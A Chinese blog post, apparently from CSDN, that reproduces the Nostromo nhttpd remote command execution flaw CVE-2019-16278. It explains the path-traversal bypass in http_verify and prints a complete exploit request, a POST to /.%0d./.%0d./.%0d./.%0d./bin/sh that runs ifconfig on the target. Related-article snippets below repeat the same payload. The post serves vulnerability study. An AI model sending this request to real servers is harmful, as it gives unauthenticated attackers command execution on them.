漏洞复现----2、Nostromo Web服务器远程命令执行(CVE-2019-16278)

已于 2022-05-30 15:25:28 修改
阅读量2.1k 收藏
点赞数
分类专栏: # 漏洞复现 网络安全技术 文章标签: CVE-2019-16278
于 2021-12-02 14:51:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/117568374
版权

文章目录

一、漏洞背景

Nostromo web(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等。

Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。 在CVE-2011-0751中攻击者可以通过/..%2f..%2f..%2fbin/sh来实现路径穿越,而后官方修复了该漏洞,CVE-2019-16278是对CVE-2011-0751的绕过,使用/.%0d./.%0d./.%0d./ 绕过对路径穿越的限制.

影响版本
Nostromo web<=1.9.6

二、漏洞原理

在下图的函数http_verify()中,请求的首行会先进行解码,然后检查/../是否存在.
在这里插入图片描述
在这里插入图片描述
函数http_proc()会将首行传递给函数http_header()
在这里插入图片描述
函数http_header()通过函数strcutl()解析数据
在这里插入图片描述
函数strcutl()的内部,会过滤字符串中的\r(回车)
在这里插入图片描述
最后,得到的路径是/../../../../bin/sh

目录穿越完成后,在函数http_proc()中的execve()函数中,执行了rh->rq_filef(/../../../../bin/sh)。
在这里插入图片描述

三、漏洞复现

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
Host: 113.108.70.111:50124
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36
Content-Length: 25

echo
echo
ifconfig 2>&1

在这里插入图片描述

参考:
https://nosec.org/home/detail/3074.html https://github.com/jas502n/CVE-2019-16278

李沉肩
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Nostromo nhttpd系列漏洞利用以及总结
jammny
10-23 1563
前言: Nostromonhttpd是一款简单快速的开源Web服务器,在Unix系统非常流行。 Nostromo 目录遍历(CVE-2011-0751) 漏洞详情: 1.9.4之前版本中存在目录遍历漏洞远程攻击者可以借助URI中的“..%2f”执行任意程序或者读取任意文件。 影响版本: versions <= 1.9.4 POC: #!/bin/sh if [ $# -lt 3 ]; then echo "Usage: $(basename $0) HOST P..
CVE-2019-16278-Nostromo Web Server远程代码执行
17bdw的编程备份笔记
12-17 155
本文主题主要是分析CVE-2019-16278漏洞原因、漏洞如何利用以及为什么会受到攻击。这个CVENostromo Web服务器(又名nhttpd)有关,这个组件是在FreeBSD,OpenBSD等Unix系统上非常流行的开源Web服务器Nostromo无法验证URL,导致可以通过路径遍历系统中的任何文件。没有通过身份验证的攻击者可以强制服务器指向/bin/sh之类的shell文件并执行...
Nostromo:Nostromo Quicksilver界面
05-17
我喜欢BezelHUD的外观,但是我从来没有觉得方形接口可以很好地用于较长的名称/字符串(我经常遇到)。 底漆对此很好用,但是看起来并不好。 我还感觉到很多接口都是在1440x900被认为是大尺寸的情况下设计的。 以下是一些可能看起来像的例子: (工作名称为PrimerHUD。) 您可以将鼠标悬停在其中一个窗格上,以查看突出显示的内容。 此接口需要Quicksilverß61或更高版本。 要创建新主题,请在Quicksilver中自定义颜色,光泽度和阴影设置,然后运行theme_extractor.py 。 它将创建一个名为Theme.plist的文件。
nostromo-cli:Nostromo CLI
05-25
诺斯特罗莫 这是用于数字产品管理的CLI应用程序。 用法 第1步-下载CLI 分发的CLI二进制文件不需要任何外部依赖关系。 因此,要开始使用,您只需要从下载适合您操作系统的二进制文件即可。 解压缩文件后,使用以下命令进行测试。 ./nostromo 您应该看到可用命令的列表。 在第一个版本中,我们提供了用于管理卡片和项目的简单命令。 第2步-设置API令牌 下一步是填写您的个​​人API令牌。 您可以在用户设置页面中找到此令牌。 之后, .env文件的内容应如下所示 NOSTROMO_API_TOKEN=YOUR_PERSONAL_TOKEN 完成后,通过列出项目来测试一切是否正常。 ./nostromo project list 步骤3-路径配置和项目设置[可选] 随时将CLI添加到Shell的路径中。 此配置特定于您的外壳。 将其放置在路径中后,可以删除./ 。 然后
freebsd查看服务_CVE-2019-16278Nostromo Web服务器远程命令执行
weixin_39763033的博客
12-09 182
在这篇文章中,我将分析CVE-2019-16278漏洞的成因,以及如何去利用它。这个漏洞存在于Nostromo web服务上(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等等。Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh...
nostromo 远程命令执行CVE-2019-16278漏洞复现
weixin_42675091的博客
09-23 947
nostromo 远程命令执行CVE-2019-16278漏洞复现
Nostromo 远程命令执行CVE-2019-16278复现
小小猪的博客
12-25 721
Nostromo 远程命令执行CVE-2019-16278复现 框架介绍: Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。 影响版本: nhttpd:version <= 1.9.6 环境搭建: 这里采用在线环境 地址 漏洞复现: 访问首页 burp抓包,构造注入命令 POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0 Host: vulfocus.fofa.so:34
(环境搭建+复现CVE-2019-16278 Nostromo Web服务器远程命令执行
daxi0ng的博客
03-13 1647
【CNVD编号】 CVE-2019-16278漏洞名称】 Nostromo Web服务器远程命令执行 1【靶标分类】 web中间件漏洞 2【漏洞分类】 命令执行 3【漏洞等级】 高 4【漏洞简介】 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的...
【Vulfocus解题复现nostromo 远程命令执行CVE-2019-16278
温氏效应
11-23 4847
Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令
CVE-2019-16278Nostromo Web服务器远程命令执行
NOSEC2019的博客
10-22 2554
在这篇文章中,我将分析CVE-2019-16278漏洞的成因,以及如何去利用它。这个漏洞存在于Nostromo web服务上(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等等。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/...
jnostromo:Razer Nostromo 电子竞技驱动程序-开源
06-29
jnostromo 包括一个易于使用的配置 gui,可将键从 nostromo 映射到键盘和/或鼠标。 配置 gui 可以隐藏,并且可以随时通过单击系统托盘图标显示 gui。 该项目的目标是让 jnostromo 成为电子竞技和竞技游戏玩家的首选...
Nostromo N50 on Vista,Seven, XP 32&64 !-开源
06-27
在 VISTA、7 和 XP 32/64 上使用 Belkin Nostromo N50 Speedpad。 无需安装驱动,插上设备即可使用! 支持正常/红色/绿色/蓝色程序级别! 在“文件”部分下载与您的操作系统匹配的文件。 GPLv3(源代码)
Linux Nostromo Speedpad Driver-开源
04-28
通过配置GUI,可以比简单的USB键盘设备访问Belkin Nostromo n50 / n52速度板。 还包括一个基本的userland linux事件接口以及用于视频和音频的OpenGL和OpenAL模块。
nostromo 远程命令执行CVE-2019-16278复现
weixin_61913198的博客
10-14 106
nostromo 远程命令执行CVE-2019-16278复现
Goby 漏洞更新 | Nostromo nhttpd远程代码执行漏洞CVE-2019-16278
m0_46699477的博客
04-21 173
CVE-2019-16278 nostromo nhttpd 是一款开源的 Web 服务器nostromo nhttpd 1.9.6 及之前版本中的 `http_verify` 函数存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
入侵防御漏洞复现(二)
最新发布
szdx1043的博客
01-16 377
Nostromo由于在验证URL安全性方面存在,导致目录穿越,任何人都可以系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令
Nostromo 1.9.6 远程代码执行漏洞CVE-2019-16278
孤桜懶契
03-28 1139
漏洞描述 用于利用 Nostromo nhttpd 中函数 http_verify 中的目录遍历漏洞利用 CVE-2019-16278 (Nostromo 1.9.6),该漏洞通过精心设计的 HTTP 请求导致未经身份验证的 RCE。仅将 Web 服务器的主机和端口作为必需参数。 漏洞影响 s ✅Nostromo 1.9.6 空间测绘 d ⭕hunter:web.similar_id="4fe4d6adce727c111450c2be583537b6"&&header.server==
漏洞复现----6、Jenkins远程命令执行漏洞CVE-2018-1000861)
七天
11-25 4335
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
漏洞复现----13、Apache Flink 文件上传漏洞 (CVE-2020-17518)
七天
11-09 3221
文章目录一、Apache Flink简介二、漏洞简介三、漏洞复现四、上传jar包getshell 一、Apache Flink简介 Apache Flink 是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。Flink 能在所有常见集群环境中运行,并能以内存速度和任意规模进行计算。Apache Flink 是一个分布式系统,它需要计算资源来执行应用程序。Flink 集成了所有常见的集群资源管理器,例如 Hadoop YARN、 Apache Mesos 和 Kubernetes,但

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值